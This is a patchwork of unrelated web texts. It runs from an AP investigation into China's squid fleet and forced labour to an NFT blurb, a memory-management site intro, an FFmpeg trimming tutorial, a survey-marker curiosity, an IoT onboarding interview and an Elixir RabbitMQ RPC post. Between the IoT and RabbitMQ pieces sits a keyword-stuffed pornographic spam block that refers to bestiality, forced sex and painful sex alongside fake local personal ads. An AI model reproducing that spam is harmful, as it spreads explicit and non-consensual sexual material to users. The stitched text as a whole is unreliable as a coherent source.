negative pushback they’re getting around the world.” China’s Foreign Ministry, the Bureau of Fisheries and the China Overseas Fisheries Association, an industry group, didn’t respond to multiple requests for an interview nor a detailed list of questions. China’s distant water fishing fleet launched in the 1980s as a response to depleting fish stocks at home and the need to feed its fast-growing population. But it’s evolved into a thriving industry and an important part of China’s geopolitical push to secure access to the world’s dwindling natural resources, says Mallory. 
In the eastern city of Zhoushan, home to China’s largest distant water fleet, an ultramodern “Squid Museum” opened this year that allows visitors to follow the squid on a sanitized, adventure-filled 3D journey from the ocean depths to the giant jiggers and their eventual processing back at home into squid rings. Researcher Pauly believes that much of the criticism of the Chinese fleet’s fishing around the Galapagos is attributed to growing anti-China sentiment in the U.S. and sensitivities about Beijing’s growing presence in what has traditionally been considered Washington’s backyard. He said imposing restrictions on high seas fishing, something that could be discussed as part of the negotiations over a high seas treaty, would be a more effective way to curtail China’s activities than bullying. “China doesn’t do anything that Europe has not done exactly the same way,” said Pauly. “The difference is that everything China does is big, so you see it.” Seafood companies in the U.S. have started to take note of the risks posed by China’s expansion and are seeking to leverage their market power to bring more transparency to the sourcing of squid. This year, a group of 16 importers and producers banded together to devise a common strategy to root out abuse. Much of their focus is on China, which is responsible for around half of the $314 million in squid that the U.S. imported in 2019, the bulk served up as fried calamari in restaurants. The initiative is opening something of a Pandora’s box for an industry that until now has thrived in the shadows without a lot of attention focused on its supply chains. The bulk of China’s squid harvest comes from the high seas, where there’s little in the way of controls like there is in many coastal waters. “Right now, it’s the perfect situation” for would-be violators, said Alfonso Miranda, executive director of CALAMASUR , a group made up of squid industry representatives from Mexico, Chile, Peru, and Ecuador. “You can do whatever you want, even forced labor, nobody says anything, and you still have a market for your product.” One alternative is to deploy technology, like publicly available AIS tracking data, to allow consumers to eventually identify the very vessel — its owner, fishing history and precise location — that caught the fish. In that way, the seafood industry can catch up with other manufacturers, from meat producers to the garment trade, where such practices are more common. “The keyword is traceability,” said Ambassador Jean Manes, the top civilian at U.S. Southern Command in Miami. “When consumers insist on traceability, the market responds.” However, boosting transparency is a challenge the industry has grappled with for decades. Nobody knows for sure how much China is fishing on the high seas. Meanwhile, critics say regional fishing management organizations that operate on the basis of consensus are powerless to block China from registering vessels with links to illegal fishing and abuse. A case in point: the Hua Li 8, which was greenlighted by China to fish in the south Pacific in 2018 — two years after it was the target of an international manhunt when it fled warning shots fired by an Argentine naval vessel that had caught it fishing illegally. 
Four of the Hua Li 8’s crew members were treated like “slaves,” Indonesian officials said at the time of the ship’s arrest pursuant to an Interpol “Purple Notice.” The ship again was involved in suspicious fishing activity in 2019, this time in the western hemisphere, when it went dark for 80 hours as it was fishing along the edge of Peru’s exclusive economic zone. At the same time as the ship was offline, vessel movements were detected inside Peru’s waters, nighttime satellite data analyzed by Global Fishing Watch shows. Craig Loveridge, executive secretary of the SPRFMO, the inter-governmental fishing group, declined requests for interviews. But in an e-mail, he pointed out that it’s up to each member to take into account the history of fishing operators when deciding whether or not to authorize a vessel to fly its flag. To address concerns, several South American governments proposed at this year’s SPRFMO meeting a number of conservation measures already in place elsewhere. Ideas included banning transshipments at sea, allowing countries to board other member states’ vessels on the high seas, and creating a buffer zone so coastal states are automatically alerted whenever a foreign vessel comes within 12 nautical miles of its territorial waters. But each proposal was shot down by China, Miranda said. “China doesn’t really seem interested in expanding protection,” said Mallory. “They follow the letter of the law but not the spirit.” Moreover, once the catch is landed in China — or a warehouse anywhere — it’s impossible to discern between legal and illegally caught fish. “This is the black hole and having clarity there is really complex,” said Miranda. “There are many things that can be done but you need to rely on credible data, which right now is lacking.” In the absence of more robust monitoring, the Ocean Warrior is something of a high seas’ sheriff holding bad actors responsible. But it’s surrounded by dozens of Chinese vessels accustomed to operating with little fear of reprisal. As the sun prepares to set, and the Chinese squid fleet awakens in time for another night of fishing, the Ocean Warrior’s crew sets out on a dinghy to inspect up close the Chang Tai 802. The ship is one of 39 vessels suspected of forced labor in a May 2021 report by Greenpeace based on complaints by workers to Indonesian authorities. Six shirtless men, all of them Indonesian, gather on the Chang Tai’s stern, gesturing friendlily and looking comforted to see another human being so far from land. But the mood quickly turns when one man, who the AP isn’t identifying by name out of concern for his safety, shouts above the engine that his boss is “not nice” and asks, with only the foggiest of comprehension, whether the coronavirus pandemic that has ravaged the world has arrived in the U.S. “I’m stuck here,” he says with a sullen look before a visibly irritated Chinese supervisor appears and orders the men back to work. “I want to go home.” A day later, when the Ocean Warrior returns with a megaphone to facilitate the open water exchange, the Chinese supervisor moves quickly to block any talk with the English-speaking strangers. But as the Chang Tai pulls away, the man throws overboard a plastic bottle stuffed with his brother’s phone number scribbled on a piece of paper. An Indonesian man who has been stuck at sea on a vessel with a history of accusations of labor abuses sends out a message in a bottle. 
Reached back home in Indonesia, the relative confesses to knowing precious little about how his brother was recruited or the conditions of his employment. Since leaving home three years ago, after graduating from a vocational school with few other job prospects, he’s communicated with his family only sporadically. He nonetheless worries for his brother’s wellbeing, to the point that he recently pressed the agency that hired him to bring him back. The Greenpeace report cites a complaint by another anonymous Indonesian sailor on the same ship who, while ill with kidney pain due to drinking poorly treated seawater, was forced to sign a document or risk being marooned in Peru with no travel documents. “I hope he can come back soon,” says the man’s brother, hesitant to reveal too much out of fear it could compromise someone’s safety. “And I hope he’s always healthy.” AP Writer Joe McDonald and AP researcher Yu Bing in Beijing, AP Global Investigations intern Roselyn Romero in San Luis Obispo, Calif., and AP Writers Edna Tarigan and Niniek Karmini in Jakarta, Indonesia, contributed to this report. Follow Goodman on Twitter: @APJoshGoodman Contact AP’s global investigative team at Investigative@ap.org or https://www.ap.org/tips/
1
International Cricket Council selling NFTs of historic cricket moments/footage
Collect: Browse and collect dozens of iconic packs on our marketplace.
Trade: Trade your digital collectibles with a global community of fans.
Use & Earn: Use your digital collectibles in games and applications to earn rewards.
2
Memory Management Reference
Welcome to the Memory Management Reference! This is a resource for programmers and computer scientists interested in memory management and garbage collection.
A glossary of more than 500 memory management terms.
Articles giving a beginner's overview of memory management.
Books and research papers related to memory management.
Frequently asked questions about memory management.
The Memory Management Reference is maintained by Ravenbrook Limited. We also maintain the Memory Pool System (an open-source, thread-safe memory manager), and we are happy to provide advanced memory management solutions to language and application developers through our consulting service.
4
How to Cut/Trim Videos in FFmpeg
In this tutorial, we’ll see how you can cut/trim/extract part of a video file using FFmpeg in 3 different ways. There are fast ways to achieve this using less-accurate seeking and copying the video, and there is a frame-accurate technique that is slow but accurate, with the option of re-encoding your video.

Let’s suppose that you want to extract a portion of your video – say from the 10th to the 20th seconds. The first thing that you need to do is tell FFmpeg to seek to the 10th second, right? This is achieved using the -ss parameter in the FFmpeg command line. Here, the time is specified as HH:MM:SS.MILLISECONDS. For example, you can tell FFmpeg to seek to 01:02:03 – i.e., the 3rd second of the 2nd minute of the 1st hour of the movie! Using -ss, we specified the start time. Now, let’s learn to specify the end time as well. And, if we put those two together, we can efficiently cut/splice a video using FFmpeg. You can specify the duration of the required clip using the -t parameter. For example, -ss 40 -t 10 instructs FFmpeg to extract 10 seconds of video starting from the 40th second. You can specify the end time using the -to parameter. For example, -ss 40 -to 70 instructs FFmpeg to extract 30 seconds of the video, starting from the 40th second to the 70th second. Note: if you use both -t and -to, then only -t will be used.

If you re-encode your video when you cut/trim, then you get a frame-accurate cut because FFmpeg will re-encode the video and start with an I-frame. Here is the command line for this using output seeking (the exact command was not preserved in this copy; a reconstructed example appears at the end of this section). In this example, you are instructing FFmpeg to read a video named inputVideo.mp4 and extract 5 seconds starting at the 3rd second and ending at the 8th second – while re-encoding it using libx264. You can also use this commandline to re-encode at a particular bitrate, or quality using crf, change the resolution, etc. Do remember that this option will take a lot of time and resources because you are performing a re-encode. But, it does have its advantages that cannot be overlooked. Here is what the output looks like. I cut a 5 second section and re-encoded it using libx264. You can see that it starts accurately at the requested time without any stutters or black frames. The time-stamp indicates this if you look carefully. This is because FFmpeg re-encodes the video from the start-time and can insert I-frames as necessary to produce a frame-accurate clip of the video.

Here is a simple commandline that you can use to cut/trim/extract a portion of your video – fast! (Again, see the reconstructed example below.) The parameters are simple to understand. You are instructing FFmpeg to read a video named inputVideo.mp4 and extract 5 seconds starting at the 3rd second and ending at the 8th second. Additionally, you are telling FFmpeg to copy the audio and video and not perform re-encoding – this is very fast! Putting the -ss parameter before the -i parameter is called input seeking and is very fast because FFmpeg jumps from I-frame to I-frame to reach the seek-point. Since the seeking operation jumps between I-frames, it is not going to accurately stop on the frame (or time) that you requested. It will search for the nearest I-frame and start the copy operation from that point. If we insert the -ss parameter after the -i parameter, it is called output seeking. But, here again is a problem.
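(Before getting to that problem, here are hedged reconstructions of the two command lines described above, based on the parameters given in the text: inputVideo.mp4 as the input, a cut from the 3rd to the 8th second, libx264 for the re-encode, and stream copy for the fast cut. Details such as the CRF value and the output file name are assumptions, not the author’s originals.)

Output seeking with re-encoding (slower, frame-accurate):

ffmpeg -i inputVideo.mp4 -ss 00:00:03 -to 00:00:08 -c:v libx264 -crf 23 -c:a copy outputVideo.mp4

Input seeking with stream copy (very fast, but snaps to the nearest I-frame):

ffmpeg -ss 00:00:03 -i inputVideo.mp4 -t 5 -c copy outputVideo.mp4

In the second command, -t 5 (a duration) is used instead of -to 00:00:08 because, on most FFmpeg builds, placing -ss before -i resets timestamps at the seek point, so an absolute end time would no longer mean what you expect.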
In video compression, you have I-frames that are independently encoded, and you have predicted frames (P, B) that depend on other frames for decoding. If the start time that you specified falls on a predicted frame, the copy operation will start with that frame (call it X). It is possible that the frames that “X” requires in order to be decoded are missing in the output! Consequently, it is possible that the output video will not start smoothly and might have some stutter, or black video until the first I-frame is reached. Here is the output. You can see that the time-stamp starts around the 5th second and carries on till the 8th second. Again, similar to input seeking, the copy has to start on an I-frame, so the clip is not frame-accurate. There you have it – three simple ways to cut, trim, or extract a portion of your videos using FFmpeg. All three methods cater to different needs, so be sure to try them out, understand your requirements, and use the right one for your project! Do visit the rest of our FFmpeg tutorials here. Thank you and see you next time! Krishna Rao Vijayanagar, Ph.D. is the Editor-in-Chief of OTTVerse, a news portal covering technological and business news in the OTT space. With extensive experience in video compression, ABR streaming, video analytics, monetization, and more, Krishna has held multiple roles in R&D, Engineering, and Product ownership at companies such as Harmonic Inc., MediaMelon, and Airtel Digital. Krishna has published numerous articles and research papers on the latest trends in OTT and frequently speaks at industry events to share his insights and perspectives on the fundamentals and the future of OTT streaming.
4
12-foot-tall replica of the Washington Monument hidden under a manhole cover
Unknown to most passersby, there’s a 12-foot-tall replica of the Washington Monument under a manhole near the actual monument. Officially known as “Bench Mark A,” this underground oddity is actually a geodetic control point that’s used by surveyors. It’s part of a network of a million control points across the country that helps the National Geodetic Survey (NGS) synchronize all of the government’s maps. According to the NGS modernization manager, “Geodetic control points provide starting points for any map or measurement. It has to be more accurate than any measurement you do on top of it, so we pick things that tend to be extremely stable.” Usually that means metal caps or rods that are driven down into the ground, but this quirky control point mirrors the form of its next-door neighbor. “All the surveys we’ve done, going back to the early 1900s, have used it,” says Smith. Most recently, it was used in the aftermath of the 2011 Washington earthquake. Measurements over the past century have shown that the marshy soil below the Washington Monument has risen 6.2 centimeters, at an average rate of 0.5 millimeters per year. The mini monument was placed in the 1880s as part of a trans-continental leveling program. The ground level here was much lower at that time, with large parts of the Washington Monument foundation still visible above ground. The mini monument was above ground for a time, before being encased in a brick chimney and buried. Outside of surveying circles, it’s been largely forgotten. Know Before You Go: The survey marker is underneath a manhole, just south of the Washington Monument. Speak to a Park Ranger before trying to see it.
1
ECUs and other IoT use cases need Onboarding Excellence
The Device Chronicle interviews Jonathan Wilkinson, an IoT project leader who passionately believes in delivering the best onboarding experience to the user setting up ECUs or other IoT devices for the first time. Jonathan is an IoT and Digital Specialist with extensive expertise in topics such as ECUs and telematics, Energy Management, Smart Home, BeMS, Smart Grid, EV Charging and Big Data Analytics. We spoke to Jonathan about two of his most recent projects: one an industrial IoT project with ECUs in lorries, and the other a consumer project with home boilers, which brings us to the main thrust of this article. Jonathan has observed that in the development of IoT products, such as ECUs in lorries, product managers and engineers are so concentrated on the product after it’s connected to the Internet that they forget that you actually have to get it on to the Wi-Fi network or cellular connection to begin with. A good IoT product has product managers and engineers who have thought this through meticulously. They have tested it with a variety of different end users in many different scenarios. Onboarding mostly happens only once, but if it works well then it will reduce significant volumes of calls to the help desk and increase customer satisfaction. IoT product makers need to think beyond designing and engineering a product that works well once it’s onboarded and activated, and actually think hard about how to ensure that the many different types of users out there, with differing degrees of tech savvy, are able to easily connect the IoT product to the Internet in the first place. Device onboarding, according to Jonathan, is often overlooked. He starts with the example of Ideal Heating, which puts connected thermostats on its boiler products. As a consumer device, an Ideal boiler with a connected thermostat has lots of different users with different technology levels, and they all need to interact with an IoT device. This brings a tremendous focus on usability. The device must be designed so that everyone can understand it, from how they operate the device to the basics of getting it connected to the Internet in the first place. This product has to deal with the reality that most users have little patience and want the device to work immediately. There are additional complicating permutations such as different types of Internet connections, different browsers in use, and users struggling to cope with access and product activation credentials. There are just so many things that can go wrong. Key stages in IoT usability with IoT devices including ECUs Jonathan describes two key stages in the IoT product usability challenge. One is the onboarding of the device and getting it connected to the Internet. Product managers must ensure that there is a slick sign-on process into the device. People hate the complexities of a password, and this can create frustration before people actually start to use the product. This is where extensive user testing helps to synthesise the best possible experience. Screen simplifies matters Jonathan continues to say that if the application interface on the IoT product does have a screen then it becomes easier. If the product doesn’t have a screen then there may be a need for a pairing mode to connect to the user’s Wi-Fi network. This makes it more challenging for many users. “Maybe they have pressed a button and then the LED flashes. These buttons can be confusing and their meaning can be lost in translation depending on who is engaging with them.
The developer will say the 1 Hz flashing LED will mean this and the 5 Hz flashing LED will mean this. But in the product user manual it will often ask the question to the end user: Is the LED flashing quickly or slowly? The end user may not know which state the LED is in.” The trick for Jonathan is to engineer every onboarding step to be simple. You will find this with a Sonos manual. Also with the Nanit IoT baby monitor product, there is a very smooth onboarding process through the manual. The use of Bluetooth to help pair the connection with Wi-Fi can also help and make general onboarding that bit easier. Connecting through an access point on the IoT device can be more challenging for consumers, especially with many mobile phone OS versions outside of iOS versions 13 and 14. Onboarding in the dark with ECUs We move to the next conundrum in IoT product onboarding: How do you onboard IoT products without buttons or LEDs? There are good examples from the consumer world of how this is done well. Sonoff is a wireless light switch and it uses a QR code to execute an outbound Bluetooth authentication. The user simply uses their phone camera to scan the QR code, and that gives the credentials to connect over Bluetooth, and the device gets onboarded onto their Wi-Fi network. In industrial IoT, there are many projects where IoT devices without screens or LEDs are deployed. Jonathan makes reference to a recent project where there is an ECU device fitted to a lorry. There is no LED and no button (to avoid water damage), there is no Bluetooth, and Wi-Fi connectivity is problematic. So how do you onboard the device? An approach that emerges in the industrial sector is a QR code used as a proof of purchase (POP) code, with the credentials held in the cloud. The QR code can be printed in the manual; once the user authenticates and proves that they are in front of the product by scanning it, they can get access to the product and commission it. Cellular power over the device life with ECUs Jonathan focused on the use of LTE-M cellular communication while he was Head of IoT at Ideal Heating. LTE-M provides ample connectivity and bandwidth for IoT, and it is a cost saver over the lifetime of the devices. A SIM card is simply inserted into the device, so that as soon as the product is powered up and it gets signal strength, the device will connect and be operational to receive and transmit data. LTE-M works at a frequency of 800 MHz over 4G-based networks, so it’s very suitable for IoT devices fitted inside buildings and even hard-to-reach locations such as cellars. Jonathan goes on to assess the coverage LTE-M offers. In the US, LTE-M is quite well established. In the UK, O2 offers LTE-M and Vodafone offers narrowband IoT (NB-IoT), so half the country has one technology and the other half has another. Jonathan continues: “There are companies selling SIM cards that will offer IoT connectivity for 10 years and will transmit 3 to 4 MB per month and update the device every 15 minutes.” Jonathan says that these SIM cards are typically used in robotic lawn mowers for GPS positioning connectivity. The connectivity is integrated as part of the service charge. This is vital as in gardens Wi-Fi connectivity may be weak or non-existent. Proactive maintenance with ECUs In a recent project Jonathan worked on, heavy goods vehicles were fitted with an IoT device that monitors tire health in fleets and detects if a tire is having problems. This could be low tire pressure or high temperature. This detection use case supports proactive maintenance.
Jonathan elaborates: “If you have a lorry or a goods vehicle and it’s out on the road, and it gets a problem with its tires and you have to get someone out to repair it, this would be downtime and money lost. So if IoT can be used to automate and simplify tire management, this could save the organisation a lot of time and money.” OTA software updates and the ECUs The ECU device that is fitted to the truck is an embedded Linux device. It uses Yocto as its operating system, and Mender provides the U-Boot support and the over-the-air software updates to the devices. The ECU that goes on the truck can work hand in hand with a second telematics device based on LTE-M. The use of Mender for robust and secure OTA software updates with the ECUs enabled the project team to get a build to market quickly. Jonathan says: “The software updates were working within a week. It’s an OTA solution that has great support for Yocto builds and great product experts to help and advise.” Mender was selected over 4 other options. Another key thing about Mender for Jonathan is the delta updates the solution provides. This means that only the required fraction of the update is transferred each time, saving on bandwidth. This is important when you consider that an updated image can be 200 to 300 MB in size each time; if a full update had to be done each time, this would be slow over cellular and cost a fortune. OTA software updates are crucial Jonathan believes in the importance of the onboarding experience for IoT project success, but he is also adamant that over-the-air software updates are critical. He says that once a robust and reliable OTA software update system is in place, operations are seamless. Users will not know that it’s happening. Bug fixes, security updates and feature releases will be delivered seamlessly to the devices. He adds that as long as you have OTA software updates that are secure and fail-safe, almost everything else can be fixed. OTA has the potential to save a situation when it comes to a detected security issue. Remember to penetration test, test, test Jonathan concludes with some IoT cybersecurity advice. “A 3rd-party penetration tester must be involved in security testing of IoT devices before they are commissioned. The security risks to IoT devices can include access elevation, where an actor signs in as a basic user and then elevates their access to an administrator before going into a device in the fleet. DoS attacks can also be easy for a hacker, especially if the IoT device has limited resources. There is considerably more risk with consumer products than with industrial products, as there are more attack vector possibilities from hobbyists once you put an application in a store for download. The challenge too with IoT devices is that often basic security principles are not adhered to by manufacturers.” Jonathan insists on making security by design an integral part of the product development strategy. Of course, manufacturers must take responsibility for ensuring the security of their products. The IoT security legislation passed into law recently in Washington will help with this. Visit iBee.uk for more information on Jonathan and the services he offers. Here’s another fascinating interview with an IoT leader in maritime.
1
Infinix Smart 5 Unboxing and Review Watch this before you buy KEY FEATURES
South Tampa good pussy amatuer. Women with naked muscular men, looking for a sexy strong man that needs woman horny married middle aged bitches to hook up with the ladies. Sullivan nude big girls swingers, nude Fairbank Iowa bi women date room, swinging couples lifestyle Southern VT swinger. Pussy flashing in lundon. Couple try mmf fuck threesome. Nude sex dares daily motion. Fuck women ass hot horny married middle aged bitches woman for discreet no strings fun with married buddys. Delcambre LA personal ads nude woman over 30 naked and legal. Average woman pose naked for a living and work a lot of percing. Sexy babes doing sexy exercise nicely. Naked pussy with a big penis fucking nice ass women ready too fuck women deep free live! Black girls giving goldenshowers, fuck book meet local women down to fuck in Ionia Michigan George West. Discreet encounters I'm a whole lot of fun not looking for nothing serious just friends people I can travel to see long time double penetration. Milfs in camps Mound Valley KS swingers, Millinocket ME horny girls closeup, horny whores in central horny married middle aged bitches who want get fuck. Sexy girl messuse fucks. Sex with a duck horny married middle aged bitches, fuck in the public nude, nude girls phone numbers for sex Port Isabel Texas only. I'm just here for some NSA fun love to give oral and make a women feel great. Can you really fuck a woman? Shemale play with lover in open places. Frendsip clab sex opan fuck. Reno Sparks NV being forced to have sex with a good dominant girl horny married middle aged bitches cell phone numbers of horny mature women in trouble. Body rub classifieds Saraland AL 36571 adult personals in central SC beach who want websites built. Scat slut in 14623 fuck site with no cc & no sign up people looking to sext near Marine City Michigan classifieds. Girls from Dana Compton Morenci showing there titties, fuck old men WI Milwaukee fuck pix around the state. Black man in my wife, women for threesome McConnellsville Ohio personals. Find a local slut for contact. Middle aged white woman get in fucked painfully. Like men who suck cock and ass in coloardosprings! Bryce Dallas women personals fuck homemade. Caliornia girl gets fucked hard in a taxi. Horny wives at the gym 3-5 times a week talented musician swinger writer performer of progressive rock. Sexual massage horny married middle aged bitches shier, black women fucking beastiality, nude at home health. I guess I'm looking for someone who also has similar qualities. Sexy marthi aai Fort Bidwell CA sex sotri. Strawberry CA adult sex black pages, looking for MFM horny married middle aged bitches couple, horny wives 50 in around Southport beach wanting sex. I'm looking for a girl on here that doesn't sound like she has a prerecorded speech made. Fucking in a circle men, sex woman hurt physical. Woman love fucking Savanna Georgia view. Kingston WA horny old women. Woman and long size cock sex horny married middle aged bitches, personal pages of nudist couple, beautiful naked interracial lovers. How to beat date ariane? Women in store nothing drink piss.
3
RPC over RabbitMQ (With Elixir)
At Community, we use RabbitMQ, a lot. It's the infrastructure backbone that allows our services (over forty at this point) to communicate with each other. That mostly happens through events (since we have an event-sourced system), but in some cases what we need is a request-response interaction between two services. This is the best tool in a few use cases, like retrieving data on the fly or asking a service to do something and return a response. An industry standard for such interactions is HTTP, but we are not big fans of that. Instead, since RabbitMQ is so ubiquitous in our system, we settled on using it for request-response interactions as well in the form of Remote Procedure Calls (RPCs). In this post, I'll go over the architecture of such interactions. I'll talk about the RabbitMQ topologies we use to make them work, the benefits around reliability, the compromises around performance, and finally how this is all implemented to be as fault-tolerant as possible with Elixir. An RPC can be seen as a function call across system boundaries, instead of at the code execution level. An RPC allows you to call a procedure on another service and treat it mostly like a local function call (with the additional error handling to account for the network interaction). I won't go into too much detail about RPCs themselves, but you're probably familiar with a common form of RPC: HTTP. HTTP request-response interactions between services in a service-oriented architecture are essentially RPCs; they're just less explicit about the fact that they're calling a procedure. One of the benefits of RPCs is, like HTTP, that they are agnostic of technologies. A service written in Elixir can make an RPC (or HTTP request) to a service written in Go, for example. If you want to read more about RPCs, their definition, their benefits, and more, guess where I'll link you to? Exactly, Wikipedia. Throughout this post, I will refer to the services involved in an RPC as the caller service and the receiver service. At Community, we chose to do RPCs over RabbitMQ, instead of the common service-to-service communication via HTTP, for a few reasons. The main reason is that we want to use message queues as often as possible. When you have a queue-based message broker between services that talk to each other, the availability requirements of the services can be less demanding. If you have two services that communicate over HTTP, then if the receiver service is down it means that the requester service will not get a response. Instead, the requester service will have to implement request retries in order to increase the chances of a successful request. With RabbitMQ in the middle, if the receiver is down then the RPC is queued and can be picked up once the receiver comes back up. Another important reason that influenced our decision is that we make heavy use of RabbitMQ for all sorts of things. This means our engineers know it well, our infrastructure is solid, and we have good systems to trace and observe messages flowing through it. One compromise we had to make is that, generally speaking, RPCs over RabbitMQ tend to be slower than direct service-to-service communication (such as HTTP). This is hard to avoid given that in our case we have a message broker sitting between the caller service and the receiver service.
That means that you'll at least have twice the RTT (round-trip time) on the network, since the messages you're sending and receiving need to jump through one more hop than if you do direct service-to-service communication. However, when we do RPCs the bottleneck is rarely the network or the message broker, and instead tends to be the processing of the RPC itself. So, we're fine with the compromise here. Let's talk about the RabbitMQ topology that powers our RPC system. We have the following components in place: A headers exchange called rpc. Caller services publish RPCs to this exchange with two headers, destination (the receiver service name) and procedure (the procedure name). Per-service queues where RPCs end up. Their name usually looks like receiver_service.rpcs. Multiple instances (nodes) of the same service share a single queue. All the running instances of the receiver service consume from this queue. A binding between each per-service queue and the rpc exchange. Since rpc is a headers exchange, the binding happens on the headers. Most commonly, receiver services bind their queue to the rpc exchange on the destination: receiver_service_name header, but sometimes we can be more flexible and specific by also using the procedure header. A per-instance response queue where responses to RPCs are published by the receiver service. Each instance of the caller service consumes from its dedicated response queue. Below is an artistic representation of the RabbitMQ topology. This one is for you, my visual friends. Our focus when designing this architecture was not performance. Since our system is event-sourced, when services need to access data fast, we usually have alternatives to RPCs. In those cases, instead of fetching data from another service via RPC, a service can usually build a "local" data store (usually Redis, but whatever fits best) by consuming events and have fast access to that data store. However, this doesn't cover use cases where a service wants to ask another service to do something and return a result. This can usually also be done via asynchronous events, but sometimes it really can't, and in any case we like the agility of RPCs for when we're moving fast and don't want to commit to particular data exchanges in the long term. Instead, we heavily focused on reliability and resource utilization. We want our RPCs to succeed whenever they can. We also want to limit RabbitMQ resource utilization as much as possible, since the message broker architecture shares the broker between all the services that use it. With these goals in mind, we came up with the topology described above. In the sketch below, I'm focusing on the caller service perspective. This is what happens, step by step, when a service makes an RPC: The caller assigns a new UUID to the request and encodes the request (we happen to use Protobuf, but anything would work). The caller includes the name of the response queue in the reply_to metadata field of the RabbitMQ message. The caller publishes the request on the main RPC exchange (rpc) using headers to specify the destination and procedure to call. If publishing the request is successful, the caller stores the request in an in-memory key-value store (ETS for Elixir and Erlang folks), storing the mapping from request ID to caller process. This is used to map responses back to requests when they come back. The caller has a pool of AMQP channels also consuming from the response queue.
When the response comes back on that queue, a consumer channel picks it up, finds the corresponding caller process from the in-memory key-value store, and hands the caller process the response. From a code standpoint, an RPC really does look like a function call. The main difference is that an RPC can definitely fail due to the network interaction, so we always make sure to return a successful value or an error value. In Elixir, that translates to {:ok, response} or {:error, reason} tuples. In a typed language (say Haskell) it would be the "either" type. This is what an RPC looks like from the caller side (in Elixir-flavored pseudocode; a hedged sketch appears at the end of this post): It's worth focusing on the response queue. All AMQP channels in the caller pool declare this queue when they start up. This is a common pattern in RabbitMQ since declaring resources (queues, exchanges, and bindings) is idempotent, that is, you can do it as many times as you want with the resource being declared only once. The response queue is declared with a key property: auto_delete. When this property is present, RabbitMQ deletes the queue as soon as there are no channels consuming from it anymore. This is exactly the behavior we want: as long as a caller pool is "up and running", there's going to be at least one channel consuming from the queue and handing responses over to caller processes. However, if the whole pool or the whole node for the caller goes down then the queue will be deleted. This works perfectly, because if the caller node goes down, then we likely lost the "context" of the requests, and even if the node comes back up, it won't know what to do with the responses anymore. As one RabbitMQ documentation page puts it: Reply messages sent using [RPC] are in general not fault-tolerant; they will be discarded if the client that published the original request subsequently disconnects. The assumption is that an RPC client will reconnect and submit another request in this case. In this way, we allow RabbitMQ to clean itself up and avoid leaving garbage in it, without writing any code to do so. The code for each AMQP channel that consumes responses goes something like this: When a response comes back, the caller does a key lookup on the response's request ID in the in-memory key-value data store to retrieve the original request and, more importantly, the process that's waiting on the response. It looks like this: The Elixir process architecture and supervision tree structure we use for the caller is based on the properties of the response queue described above. We have the following constraints: If the in-memory key-value store that holds the mappings between request IDs and caller processes (ETS) crashes, we want the whole pool to crash. We wouldn't be able to map responses back to requests in any case at that point, and it's better to let RabbitMQ delete the whole response queue in such cases. If a connection or a channel goes down, we don't want to delete the response queue. As long as there's at least one channel consuming from the response queue, we'll be able to hand responses back to the corresponding caller processes. With these constraints, we designed this supervision tree: It's pretty deep and nested, but a lot of it is dancing to use the right supervision strategies. We have a main supervisor for the whole caller architecture. Then, we have a pool supervisor that supervises the connections and channels. That supervisor's children are supervisors that each look over one AMQP connection and one "channel supervisor".
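To make that structure concrete, here is a minimal Elixir sketch of the top of such a supervision tree. The module names are hypothetical and the pool and channel supervisors are only referenced, not shown; this is a sketch of the idea, not our exact code.

defmodule RPC.Caller.Supervisor do
  use Supervisor

  def start_link(opts), do: Supervisor.start_link(__MODULE__, opts, name: __MODULE__)

  @impl true
  def init(_opts) do
    children = [
      # Owns the ETS table that maps request IDs to caller processes. With
      # :rest_for_one, if this crashes then the pool below is restarted too,
      # so the channels (and therefore the auto-deleted response queue) go
      # away together with the lost request mappings.
      RPC.Caller.RequestStore,
      # Supervises one child per RabbitMQ connection; each of those children
      # in turn supervises the connection process and a channel supervisor.
      RPC.Caller.PoolSupervisor
    ]

    Supervisor.init(children, strategy: :rest_for_one)
  end
end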
The channel supervisor supervises AMQP channels. That was hard to type, but hopefully it makes sense? I won't go into detail here, but the point of this design is that if anything in that supervisor fails, the failures bubble up and cascade correctly. If there's really nothing more fun that you could do (I hardly believe that), play "kill the process" in your head and see what happens when you kill any process above. It's fun, if this sort of stuff is fun for you (which is a tautology). The registry shown in the diagram is an Elixir Registry that all AMQP channels register themselves to. This allows us to access AMQP channels fast, without going through a single pool process. I talked more about Registry-based process pools in Elixir in another blog post. All the code in there is built on top of the AMQP Elixir library. The receiver architecture, compared to the caller, is straightforward. Every service sets up a pool of RabbitMQ connections (and channels), declares a queue, and binds it to the main RPC exchange (rpc). That exchange is a headers exchange, and each service usually binds the queue with the destination header matching that service. For example, here's the pseudocode for the receiver_svc service: All AMQP channels over all nodes of the receiver service declare the queue and bind it on every startup. Idempotency, friends! From here, it's all downhill: when a request comes in on a channel, the node decodes it, processes it, produces a response, and publishes it back on RabbitMQ. Where does it publish it? Well, good question. That's why all requests have the reply_to RabbitMQ metadata field set to the reply queue of the caller. We take advantage of the default (nameless) direct exchange, which is pre-declared by all RabbitMQ nodes, to publish the response directly to the reply queue. The pseudocode to handle a request is this: Below is a nice artsy drawing focusing on the RabbitMQ topology and interactions of the receiver service. As far as Elixir specifics go, we use Broadway to consume RPCs, hooking it up with the broadway_rabbitmq producer. I personally made enough changes to broadway_rabbitmq by now that, look at that, it perfectly fits our use case! This is what a typical Broadway pipeline to consume RPCs looks like in our services (a hedged sketch appears at the end of this post): As you can see, broadway_rabbitmq exposes the AMQP channel it uses to consume under the hood in the message metadata. We use that to send replies. Easy-peasy. Small disclaimer: we have a wrapper library around Broadway that makes this slightly boilerplate-y code a bit simpler and more tailored to our use case. It also provides us with some nice additions such as round-robin connection attempts over a list of RabbitMQ URLs (for reliability), automatic decoding of requests (so that the decoding is done under the hood), metrics, error reporting, and so on. However, the gist of it is exactly the code above. We saw how we architected a system to make service-to-service RPCs over RabbitMQ. Then, we went over the RabbitMQ topology we use, showing all the queues, exchanges, and bindings involved. Finally, we also covered the Elixir-specific implementation of this system, to sprinkle some practical examples on top of this stuff. Here are some more resources on RPCs over RabbitMQ: RabbitMQ's tutorial shows a nice step-by-step implementation of RPCs over RabbitMQ using the Python client. It's a bit less complex than our architecture since the response queue doesn't get deleted when the caller stops, but it can still go a long way.
